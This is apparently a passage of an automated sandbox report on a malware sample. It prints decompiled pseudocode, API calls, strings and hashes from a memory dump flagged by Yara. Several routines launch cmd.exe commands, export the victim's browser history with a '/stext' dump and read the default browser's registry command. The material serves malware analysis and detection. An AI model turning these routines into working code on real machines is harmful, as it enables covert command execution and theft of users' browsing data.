                              • Instruction ID: ea825e8bd67a10857e8b7964dc2fd0b8df6dfe7544f80a4ef1d900d86e80f7e8
                              • Opcode Fuzzy Hash: 255b8a181737147229ba99e999fd0b5ca8637e7c11ae7a67e0008db9ce4defcd
                              • Instruction Fuzzy Hash: 0E11A371204118BFEB104F64AC89EFB777CEB05365F104266FD25D6280C6748E819668
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 93%
                              			E0044618A() {
                              				int _v8;
                              				void* __ecx;
                              				void* _t6;
                              				int _t7;
                              				char* _t13;
                              				int _t17;
                              				void* _t19;
                              				char* _t25;
                              				WCHAR* _t27;
                              
                              				_t27 = GetEnvironmentStringsW();
                              				if(_t27 == 0) {
                              					L7:
                              					_t13 = 0;
                              				} else {
                              					_t6 = E00446153(_t27);
                              					_pop(_t19);
                              					_t17 = _t6 - _t27 >> 1;
                              					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
                              					_v8 = _t7;
                              					if(_t7 == 0) {
                              						goto L7;
                              					} else {
                              						_t25 = L0043E61D(_t19, _t7);
                              						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
                              							_t13 = 0;
                              						} else {
                              							_t13 = _t25;
                              							_t25 = 0;
                              						}
                              						L0043EE85(_t25);
                              					}
                              				}
                              				if(_t27 != 0) {
                              					FreeEnvironmentStringsW(_t27);
                              				}
                              				return _t13;
                              			}

                              0x00446199
                              0x0044619f
                              0x004461f7
                              0x004461f7
                              0x004461a1
                              0x004461a2
                              0x004461a7
                              0x004461b0
                              0x004461b6
                              0x004461bc
                              0x004461c1
                              0x00000000
                              0x004461c3
                              0x004461c9
                              0x004461ce
                              0x004461ec
                              0x004461e6
                              0x004461e6
                              0x004461e8
                              0x004461e8
                              0x004461ef
                              0x004461f4
                              0x004461c1
                              0x004461fb
                              0x004461fe
                              0x004461fe
                              0x0044620c

                              APIs
                              • GetEnvironmentStringsW.KERNEL32 ref: 00446193
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004461B6
                                • Part of subcall function 0043E61D: HeapAlloc.KERNEL32(00000000,0042F939,?,?,00431057,?,?,0046C500,?,?,0040BA4E,0042F939,?,?,?,?), ref: 0043E64F
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004461DC
                              • _free.LIBCMT ref: 004461EF
                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004461FE
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                              • String ID:
                              • API String ID: 2278895681-0
                              • Opcode ID: 1d06af7fe9b9c0b38868f9dfd187ca8fc9741270ba8cbd3e824131a6f2c0cc53
                              • Instruction ID: a4a757ec6fd77dd09b4353e0e1f60453f24905d0662e5e34b4457866c2e58ca0
                              • Opcode Fuzzy Hash: 1d06af7fe9b9c0b38868f9dfd187ca8fc9741270ba8cbd3e824131a6f2c0cc53
                              • Instruction Fuzzy Hash: A901D4B26017117B73211AB76C8CC7B696DDAC7BA6716013EB914C3242DE69CE0281BA
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00412092(void* __edx, void* __ebp, void* __eflags, char _a16, char _a60, void* _a92, char _a96, void* _a128, void* _a152) {
                              				void* _t11;
                              
                              				_t41 = __eflags;
                              				_t11 = E0040425F(0,  &_a96, L00401F75(L00401E29( &_a16, __edx, __eflags, 0)));
                              				_t35 = L"/C ";
                              				ShellExecuteW(0, L"open", L"cmd.exe", L00401ECB(E004043E5(0,  &_a60, L"/C ", _t41, _t11)), 0, 0);
                              				L00401ED0();
                              				L00401ED0();
                              				L00401E54( &_a16, _t35);
                              				L00401FA7();
                              				L00401FA7();
                              				return 0;
                              			}

                              0x00412092
                              0x004120ac
                              0x004120b2
                              0x004120d4
                              0x004120de
                              0x00412b2a
                              0x00412d65
                              0x00412d71
                              0x00412d7d
                              0x00412d8a

                              APIs
                              • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004120D4
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell
                              • String ID: /C $cmd.exe$open
                              • API String ID: 587946157-3896048727
                              • Opcode ID: 11973db372174fcf02deb38d026be97b5300a590d3a5e83f242000d1361fd6a3
                              • Instruction ID: c2a54c5d25423007233d6e2fd92019bc1db18d9fdb92d93029f1e952cb8c39d0
                              • Opcode Fuzzy Hash: 11973db372174fcf02deb38d026be97b5300a590d3a5e83f242000d1361fd6a3
                              • Instruction Fuzzy Hash: AEF036712083415BC214FB72DC92DAF7398AF90349F50183FB546A21F2EF7C9919865A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 63%
                              			E0041033E(void* __ecx) {
                              				void* _v8;
                              				int _v12;
                              				char _v2060;
                              				void* _t17;
                              				void* _t21;
                              
                              				_v12 = 0x400;
                              				_t21 = __ecx;
                              				if(RegOpenKeyExW(0x80000000, L"http\\shell\\open\\command", 0, 0x20019,  &_v8) != 0) {
                              					_push(0x45f714);
                              				} else {
                              					RegQueryValueExW(_v8, 0, 0, 0,  &_v2060,  &_v12);
                              					RegCloseKey(_v8);
                              					_push( &_v2060);
                              				}
                              				E0040425F(_t17, _t21);
                              				return _t21;
                              			}

                              Instruction addresses (per decompiled line): 0x0041034c, 0x0041035b, 0x00410370, 0x0041039b, 0x00410372, 0x00410383, 0x0041038c, 0x00410398, 0x00410398, 0x004103a2, 0x004103ae

                              APIs
                              • RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,0046C578,?), ref: 00410368
                              • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 00410383
                              • RegCloseKey.ADVAPI32(00000000), ref: 0041038C
                              Strings
                              • http\shell\open\command, xrefs: 0041035E
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: CloseOpenQueryValue
                              • String ID: http\shell\open\command
                              • API String ID: 3677997916-1487954565
                              • Opcode ID: c3ece9ae41de18da39866ca09f3ec837f6cd14938ba6571f295f513c724457e9
                              • Instruction ID: 174bb4f21a826f001835e6ed766069888861b3d143c64ebc0b38a31aaf37e10a
                              • Opcode Fuzzy Hash: c3ece9ae41de18da39866ca09f3ec837f6cd14938ba6571f295f513c724457e9
                              • Instruction Fuzzy Hash: 49F0C87150020CFBDB109A95EC09FDFBBBCEB85B02F1000A6B905E2050DA705A8587A8
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 95%
                              			E0043B0B1(void* _a4, intOrPtr* _a8) {
                              				char _v5;
                              				intOrPtr _v12;
                              				char _v16;
                              				signed int _t44;
                              				char _t47;
                              				intOrPtr _t50;
                              				signed int _t52;
                              				signed int _t56;
                              				signed int _t57;
                              				void* _t59;
                              				signed int _t63;
                              				signed int _t65;
                              				char _t67;
                              				intOrPtr* _t68;
                              				intOrPtr* _t69;
                              				intOrPtr* _t71;
                              				intOrPtr _t75;
                              				void* _t76;
                              				void* _t77;
                              				signed int _t80;
                              				intOrPtr _t82;
                              				void* _t86;
                              				signed int _t87;
                              				void* _t89;
                              				signed int _t91;
                              				intOrPtr* _t98;
                              				void* _t101;
                              				intOrPtr _t102;
                              				intOrPtr _t103;
                              
                              				_t101 = _a4;
                              				if(_t101 != 0) {
                              					_t80 = 9;
                              					memset(_t101, _t44 | 0xffffffff, _t80 << 2);
                              					_t98 = _a8;
                              					__eflags = _t98;
                              					if(_t98 != 0) {
                              						_t82 =  *((intOrPtr*)(_t98 + 4));
                              						_t47 =  *_t98;
                              						_v16 = _t47;
                              						_v12 = _t82;
                              						__eflags = _t82 - 0xffffffff;
                              						if(__eflags > 0) {
                              							L7:
                              							_t89 = 7;
                              							__eflags = _t82 - _t89;
                              							if(__eflags < 0) {
                              								L12:
                              								_v5 = 0;
                              								_t50 = E0043B1FE(_t82, __eflags,  &_v16,  &_v5);
                              								_t75 = _v16;
                              								 *((intOrPtr*)(_t101 + 0x14)) = _t50;
                              								_t52 = L00450430(_t75, _v12, 0x15180, 0);
                              								 *(_t101 + 0x1c) = _t52;
                              								_t86 = 0x4591c8;
                              								_t76 = _t75 - _t52 * 0x15180;
                              								asm("sbb eax, edx");
                              								__eflags = _v5;
                              								if(_v5 == 0) {
                              									_t86 = 0x459194;
                              								}
                              								_t91 =  *(_t101 + 0x1c);
                              								_t56 = 1;
                              								__eflags =  *((intOrPtr*)(_t86 + 4)) - _t91;
                              								if( *((intOrPtr*)(_t86 + 4)) >= _t91) {
                              									L16:
                              									_t57 = _t56 - 1;
                              									 *(_t101 + 0x10) = _t57;
                              									 *((intOrPtr*)(_t101 + 0xc)) = _t91 -  *((intOrPtr*)(_t86 + _t57 * 4));
                              									_t59 = L00450430( *_t98,  *((intOrPtr*)(_t98 + 4)), 0x15180, 0);
                              									_t87 = 7;
                              									asm("cdq");
                              									 *(_t101 + 0x18) = (_t59 + 4) % _t87;
                              									_t63 = L00450430(_t76, _v12, 0xe10, 0);
                              									 *(_t101 + 8) = _t63;
                              									_t77 = _t76 - _t63 * 0xe10;
                              									asm("sbb edi, edx");
                              									_t65 = L00450430(_t77, _v12, 0x3c, 0);
                              									 *(_t101 + 0x20) =  *(_t101 + 0x20) & 0x00000000;
                              									 *(_t101 + 4) = _t65;
                              									_t67 = 0;
                              									__eflags = 0;
                              									 *_t101 = _t77 - _t65 * 0x3c;
                              									L17:
                              									return _t67;
                              								} else {
                              									do {
                              										_t56 = _t56 + 1;
                              										__eflags =  *((intOrPtr*)(_t86 + _t56 * 4)) - _t91;
                              									} while ( *((intOrPtr*)(_t86 + _t56 * 4)) < _t91);
                              									goto L16;
                              								}
                              							}
                              							if(__eflags > 0) {
                              								L10:
                              								_t68 = L00439E14();
                              								_t102 = 0x16;
                              								 *_t68 = _t102;
                              								L11:
                              								_t67 = _t102;
                              								goto L17;
                              							}
                              							__eflags = _t47 - 0x934126cf;
                              							if(__eflags <= 0) {
                              								goto L12;
                              							}
                              							goto L10;
                              						}
                              						if(__eflags < 0) {
                              							goto L10;
                              						}
                              						__eflags = _t47 - 0xffff5740;
                              						if(_t47 < 0xffff5740) {
                              							goto L10;
                              						}
                              						goto L7;
                              					}
                              					_t69 = L00439E14();
                              					_t102 = 0x16;
                              					 *_t69 = _t102;
                              					E0043626D();
                              					goto L11;
                              				}
                              				_t71 = L00439E14();
                              				_t103 = 0x16;
                              				 *_t71 = _t103;
                              				E0043626D();
                              				return _t103;
                              			}

                              Instruction addresses (per decompiled line):
                              0x0043b0ba, 0x0043b0bf, 0x0043b0df, 0x0043b0e0, 0x0043b0e2, 0x0043b0e5, 0x0043b0e7, 0x0043b0fa, 0x0043b0fd, 0x0043b0ff,
                              0x0043b102, 0x0043b105, 0x0043b108, 0x0043b113, 0x0043b115, 0x0043b116, 0x0043b118, 0x0043b134, 0x0043b138, 0x0043b141,
                              0x0043b146, 0x0043b14d, 0x0043b15a, 0x0043b15f, 0x0043b169, 0x0043b16e, 0x0043b173, 0x0043b175, 0x0043b17c, 0x0043b17e,
                              0x0043b17e, 0x0043b183, 0x0043b188, 0x0043b189, 0x0043b18c, 0x0043b194, 0x0043b194, 0x0043b195, 0x0043b1a3, 0x0043b1ab,
                              0x0043b1b8, 0x0043b1b9, 0x0043b1c3, 0x0043b1c9, 0x0043b1d3, 0x0043b1da, 0x0043b1de, 0x0043b1e2, 0x0043b1e7, 0x0043b1eb,
                              0x0043b1f3, 0x0043b1f3, 0x0043b1f5, 0x0043b1f8, 0x00000000, 0x0043b18e, 0x0043b18e, 0x0043b18e, 0x0043b18f, 0x0043b18f,
                              0x00000000, 0x0043b18e, 0x0043b18c, 0x0043b11a, 0x0043b123, 0x0043b123, 0x0043b12a, 0x0043b12b, 0x0043b12d, 0x0043b12d,
                              0x00000000, 0x0043b12d, 0x0043b11c, 0x0043b121, 0x00000000, 0x00000000, 0x00000000, 0x0043b121, 0x0043b10a, 0x00000000,
                              0x00000000, 0x0043b10c, 0x0043b111, 0x00000000, 0x00000000, 0x00000000, 0x0043b111, 0x0043b0e9, 0x0043b0f0, 0x0043b0f1,
                              0x0043b0f3, 0x00000000, 0x0043b0f3, 0x0043b0c1, 0x0043b0c8, 0x0043b0c9, 0x0043b0cb, 0x00000000

                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: dfab41341134f6dcce459e2fdfd81568117331f2860a1a7b03757cfc8fe9326c
                              • Instruction ID: fabbc6a6f7032cda4dd40e8c936e700ba33ba9abdb81f3509140ce19fd5ad8dd
                              • Opcode Fuzzy Hash: dfab41341134f6dcce459e2fdfd81568117331f2860a1a7b03757cfc8fe9326c
                              • Instruction Fuzzy Hash: 08410672A00304AFDB249F39CC51BAB7BA9EB8C714F10962FF211DB281D779994187C4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 83%
                              			E00417334(WCHAR* __ecx, intOrPtr __edx) {
                              				intOrPtr _v8;
                              				long _v12;
                              				void* __ebx;
                              				void* __edi;
                              				struct _OVERLAPPED* _t13;
                              				struct _OVERLAPPED* _t15;
                              				void* _t22;
                              				long _t25;
                              
                              				_push(__ecx);
                              				_push(__ecx);
                              				_t15 = 0;
                              				_v8 = __edx;
                              				_t22 = CreateFileW(__ecx, 0x80000000, 3, 0, 3, 0x80, 0);
                              				if(_t22 != 0xffffffff) {
                              					_t25 = GetFileSize(_t22, 0);
                              					L00402439(0, _v8, _t22, _t25, 0);
                              					_v12 = 0;
                              					if(ReadFile(_t22, L00401F75(_v8), _t25,  &_v12, 0) != 0) {
                              						_t15 = 1;
                              					}
                              					CloseHandle(_t22);
                              					_t13 = _t15;
                              				} else {
                              					_t13 = 0;
                              				}
                              				return _t13;
                              			}

                              Instruction addresses (per decompiled line): 0x00417337, 0x00417338, 0x0041733b, 0x0041733d, 0x00417357, 0x0041735c, 0x0041736e, 0x00417372, 0x00417380, 0x00417393, 0x00417395, 0x00417395, 0x00417398, 0x0041739e, 0x0041735e, 0x0041735e, 0x0041735e, 0x004173a5

                              APIs
                              • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,00000000,00000000,?,00408D90), ref: 00417351
                              • GetFileSize.KERNEL32(00000000,00000000,?,?,00408D90), ref: 00417365
                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,?,00408D90), ref: 0041738A
                              • CloseHandle.KERNEL32(00000000,00408D90), ref: 00417398
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleReadSize
                              • String ID:
                              • API String ID: 3919263394-0
                              • Opcode ID: 98df5892a511ccc02ddf4b8e33454f1bfa62b64891cfbe56f84ffc5860e86bc6
                              • Instruction ID: 56c905e826b57cd088f8bccfe3f058dde1bc79989e28d4bbb664d7596ff6dfd6
                              • Opcode Fuzzy Hash: 98df5892a511ccc02ddf4b8e33454f1bfa62b64891cfbe56f84ffc5860e86bc6
                              • Instruction Fuzzy Hash: 8C01D671501218BFE7105F61AC89EFF777CEB45799F10016AFC04A3281D6749E019634
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 90%
                              			E0040412D(void* __ebx) {
                              				char _v28;
                              				char _v52;
                              				char _v76;
                              				char _v100;
                              				char _v124;
                              				char _v148;
                              				char _v172;
                              				short _v692;
                              				void* __edi;
                              				WCHAR* _t40;
                              				struct HINSTANCE__* _t81;
                              				struct HINSTANCE__* _t84;
                              				void* _t85;
                              
                              				_t48 = __ebx;
                              				_t81 = 0;
                              				GetModuleFileNameW(0,  &_v692, 0x104);
                              				E004020B5(__ebx,  &_v52);
                              				L00417967( &_v28, 0x30, L00401F75(L004169EB( &_v76)));
                              				L00401FA7();
                              				L00401F75(0x46c1a0);
                              				L00413CCA(L00401ECB(E00403086(_t48,  &_v100, L00404409(_t48,  &_v124, E004043E5(_t48,  &_v148,  &_v692, 0, E0040425F(__ebx,  &_v172, L" /sort \"Visit Time\" /stext \"")), 0,  &_v28), 0, 0, "\"")));
                              				L00401ED0();
                              				L00401ED0();
                              				L00401ED0();
                              				L00401ED0();
                              				_t84 = 0;
                              				while(1) {
                              					_t40 = L00401ECB( &_v28);
                              					_t80 =  &_v52;
                              					if(E00417334(_t40,  &_v52) != 0) {
                              						break;
                              					}
                              					Sleep(0xfa);
                              					_t84 =  &(_t84->i);
                              					if(_t84 < 0x14) {
                              						continue;
                              					} else {
                              					}
                              					L5:
                              					L00401ED0();
                              					L00401FA7();
                              					return _t81;
                              				}
                              				E004020CC(_t48, _t85 - 0x18,  &_v52, __eflags,  &_v52);
                              				_push(0x9d);
                              				L00404A6E(_t48, 0x46c138, _t80, __eflags);
                              				_t81 = 1;
                              				__eflags = 1;
                              				goto L5;
                              			}

                              Instruction addresses (per decompiled line):
                              0x0040412d, 0x00404144, 0x00404147, 0x00404150, 0x0040416a, 0x00404173, 0x0040417d, 0x004041d1, 0x004041d9, 0x004041e1,
                              0x004041ec, 0x004041f7, 0x004041fc, 0x004041fe, 0x00404201, 0x00404206, 0x00404212, 0x00000000, 0x00000000, 0x00404219,
                              0x0040421f, 0x00404223, 0x00000000, 0x00000000, 0x00404225, 0x00404247, 0x0040424a, 0x00404252, 0x0040425e, 0x0040425e,
                              0x00404230, 0x00404235, 0x0040423f, 0x00404246, 0x00404246, 0x00000000

                              APIs
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404147
                                • Part of subcall function 004169EB: GetCurrentProcessId.KERNEL32(00000000,73BCFBB0,00000000,?,?,?,?,?,0040B275,.vbs), ref: 00416A12
                                • Part of subcall function 00413CCA: CloseHandle.KERNEL32(004041D6,?,004041D6,0045F454), ref: 00413CE0
                                • Part of subcall function 00413CCA: CloseHandle.KERNEL32(0045F454,?,004041D6,0045F454), ref: 00413CE9
                                • Part of subcall function 00417334: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,00000000,00000000,?,00408D90), ref: 00417351
                              • Sleep.KERNEL32(000000FA,0045F454), ref: 00404219
                              Strings
                              • /sort "Visit Time" /stext ", xrefs: 00404193
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                              • String ID: /sort "Visit Time" /stext "
                              • API String ID: 368326130-1573945896
                              • Opcode ID: 8620ccba64e66514bcd4bbb16099e4372e9d8629654790d9b1500f09994f0856
                              • Instruction ID: 077a0f2c23c77d26b68de5e3cb7190eb75c300570ed309256026d755c7120731
                              • Opcode Fuzzy Hash: 8620ccba64e66514bcd4bbb16099e4372e9d8629654790d9b1500f09994f0856
                              • Instruction Fuzzy Hash: 5A318471A1021857CB14FBB6DC969EE7775AF90309F00007FB506B71E2EF381A4ACA99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 28%
                              			E0044132F(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
                              				signed int _v8;
                              				signed int _t18;
                              				intOrPtr* _t31;
                              				signed int _t33;
                              
                              				_t26 = __ecx;
                              				_push(__ecx);
                              				_t18 =  *0x46a00c; // 0x7df2b874
                              				_v8 = _t18 ^ _t33;
                              				_push(__esi);
                              				_t31 = L00440C46(0x16, "LCMapStringEx", 0x4590ec, 0x4590f4);
                              				if(_t31 == 0) {
                              					LCMapStringW(L004413B7(_t26, _t31, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
                              				} else {
                              					 *0x45346c(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
                              					 *_t31();
                              				}
                              				return L0042F61B(_v8 ^ _t33);
                              			}

                              Instruction addresses (per decompiled line): 0x0044132f, 0x00441334, 0x00441335, 0x0044133c, 0x0044133f, 0x00441356, 0x0044135d, 0x004413a0, 0x0044135f, 0x0044137c, 0x00441382, 0x00441382, 0x004413b4

                              APIs
                              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,00428772), ref: 004413A0
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: String
                              • String ID: LCMapStringEx$@
                              • API String ID: 2568140703-230199810
                              • Opcode ID: d8b27bcf48bc9654abab763dba499bbd76732c53fd0bf8c262b8ba2a6f0e4add
                              • Instruction ID: 328293ae2da74c3881d3de9e1e1d62cea5772e6c780c88eb29c835c9fd5874b5
                              • Opcode Fuzzy Hash: d8b27bcf48bc9654abab763dba499bbd76732c53fd0bf8c262b8ba2a6f0e4add
                              • Instruction Fuzzy Hash: 3C012532500209FBDF125F90DC02EEE7F62EF08755F004126FE0426161CA3AC971EB99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetTimeFormatW.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,004401EB,?,00000000,00401D19), ref: 00441182
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: FormatTime
                              • String ID: GetTimeFormatEx$@
                              • API String ID: 3606616251-597012884
                              • Opcode ID: e18defe2a157fc6ceb45431b8018b2d218c0bef47ea8d3fbbce7efe0c819ccca
                              • Instruction ID: 597dd883ab71028faa77f39812b87aa423b0666660f34cf126ad643169d29e88
                              • Opcode Fuzzy Hash: e18defe2a157fc6ceb45431b8018b2d218c0bef47ea8d3fbbce7efe0c819ccca
                              • Instruction Fuzzy Hash: DCF0C83164021CFBDF126F61DC02EAF7F21EF08B51F10452AFE05172A1CA798D259B99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 39%
                              			E00441199(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                              				signed int _v8;
                              				signed int _t7;
                              				void* _t20;
                              				intOrPtr* _t23;
                              				signed int _t25;
                              
                              				_t20 = __edx;
                              				_t16 = __ecx;
                              				_push(__ecx);
                              				_t7 =  *0x46a00c; // 0x7df2b874
                              				_v8 = _t7 ^ _t25;
                              				_t23 = L00440C46(0x11, "GetUserDefaultLocaleName", 0x4590a4, "GetUserDefaultLocaleName");
                              				if(_t23 == 0) {
                              					E004412C5(__ebx, _t16, _t20, __edi, _t23, __eflags, GetUserDefaultLCID(), _a4, _a8, 0);
                              				} else {
                              					 *0x45346c(_a4, _a8);
                              					 *_t23();
                              				}
                              				return L0042F61B(_v8 ^ _t25);
                              			}

                              0x00441199
                              0x00441199
                              0x0044119e
                              0x0044119f
                              0x004411a6
                              0x004411c0
                              0x004411c7
                              0x004411ea
                              0x004411c9
                              0x004411d1
                              0x004411d7
                              0x004411d7
                              0x004411fd

                              APIs
                              • GetUserDefaultLCID.KERNEL32(00000055,?,00000000,00448438,?,00000055,00000050), ref: 004411E3
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: DefaultUser
                              • String ID: GetUserDefaultLocaleName$@
                              • API String ID: 3358694519-2432190263
                              • Opcode ID: 90c388354acc68b76619c00604a582a4408c9a1ccc77837c827a5096964a56ca
                              • Instruction ID: 3ac9f703888ec721985dbf6bd802d6cf8197e55589d78a152d54f94c28d6ea82
                              • Opcode Fuzzy Hash: 90c388354acc68b76619c00604a582a4408c9a1ccc77837c827a5096964a56ca
                              • Instruction Fuzzy Hash: 90F02B30600218FBDB106F61DC02E5E7FA0EF04B11F104466FD05561A2DA758E149BDD
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 25%
                              			E00441262(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4) {
                              				signed int _v8;
                              				signed int _t5;
                              				intOrPtr* _t18;
                              				signed int _t20;
                              
                              				_t13 = __ecx;
                              				_push(__ecx);
                              				_t5 =  *0x46a00c; // 0x7df2b874
                              				_v8 = _t5 ^ _t20;
                              				_push(__esi);
                              				_t18 = L00440C46(0x15, "IsValidLocaleName", 0x4590d0, "IsValidLocaleName");
                              				if(_t18 == 0) {
                              					IsValidLocale(L004413B7(_t13, _t18, __eflags, _a4, 0), 1);
                              				} else {
                              					 *0x45346c(_a4);
                              					 *_t18();
                              				}
                              				return L0042F61B(_v8 ^ _t20);
                              			}

                              0x00441262
                              0x00441267
                              0x00441268
                              0x0044126f
                              0x00441272
                              0x00441289
                              0x00441290
                              0x004412ae
                              0x00441292
                              0x00441297
                              0x0044129d
                              0x0044129d
                              0x004412c2

                              APIs
                              • IsValidLocale.KERNEL32(00000000,0043CFD0,00000000,00000001,?,?,0043CFD0,?,?,0043C9B0,?,00000004), ref: 004412AE
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: LocaleValid
                              • String ID: IsValidLocaleName$@
                              • API String ID: 1901932003-2778040366
                              • Opcode ID: af6bfaf10eedc7b2d13639744446c0f101df4d5affd74620e5c0cda37b3ac205
                              • Instruction ID: 51e1be3ffe8f4d9107f84abeff18eb9e3ab6bbbe641bbbca65fbd3cae13f37de
                              • Opcode Fuzzy Hash: af6bfaf10eedc7b2d13639744446c0f101df4d5affd74620e5c0cda37b3ac205
                              • Instruction Fuzzy Hash: 23F05930640708F7DB106F20DC02FAE7B54DB00B12F10016AFD05B72D1DAB88D148A9D
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 20%
                              			E00441200(void* __ecx, void* __esi, void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
                              				signed int _v8;
                              				signed int _t8;
                              				intOrPtr* _t20;
                              				signed int _t22;
                              
                              				_push(__ecx);
                              				_t8 =  *0x46a00c; // 0x7df2b874
                              				_v8 = _t8 ^ _t22;
                              				_t20 = L00440C46(0x14, "InitializeCriticalSectionEx", 0x4590c8, 0x4590d0);
                              				if(_t20 == 0) {
                              					InitializeCriticalSectionAndSpinCount(_a4, _a8);
                              				} else {
                              					 *0x45346c(_a4, _a8, _a12);
                              					 *_t20();
                              				}
                              				return L0042F61B(_v8 ^ _t22);
                              			}

                              0x00441205
                              0x00441206
                              0x0044120d
                              0x00441227
                              0x0044122e
                              0x0044124b
                              0x00441230
                              0x0044123b
                              0x00441241
                              0x00441241
                              0x0044125f

                              APIs
                              • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044437F,-00000020,00000FA0,00000000,?,?), ref: 0044124B
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: CountCriticalInitializeSectionSpin
                              • String ID: InitializeCriticalSectionEx$@
                              • API String ID: 2593887523-1288605549
                              • Opcode ID: fa53c4b1efa0943462c88759d19cc67ec6d1fc6053c53cb60ae7065c619b4311
                              • Instruction ID: d51398674981bb72eabf597e0de5951d7e9872e17945c585b36a5d9ca4153329
                              • Opcode Fuzzy Hash: fa53c4b1efa0943462c88759d19cc67ec6d1fc6053c53cb60ae7065c619b4311
                              • Instruction Fuzzy Hash: 98F02431600218FBCB115F50DC02EAEBF60EF04712B10406AFC096A271DA758E24DA99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Executed Functions

                              C-Code - Quality: 100%
                              			E0043B789(int _a4) {
                              				void* _t14;
                              				void* _t16;
                              
                              				if(E00441445(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
                              					TerminateProcess(GetCurrentProcess(), _a4);
                              				}
                              				E0043B80E(_t14, _t16, _a4);
                              				ExitProcess(_a4);
                              			}

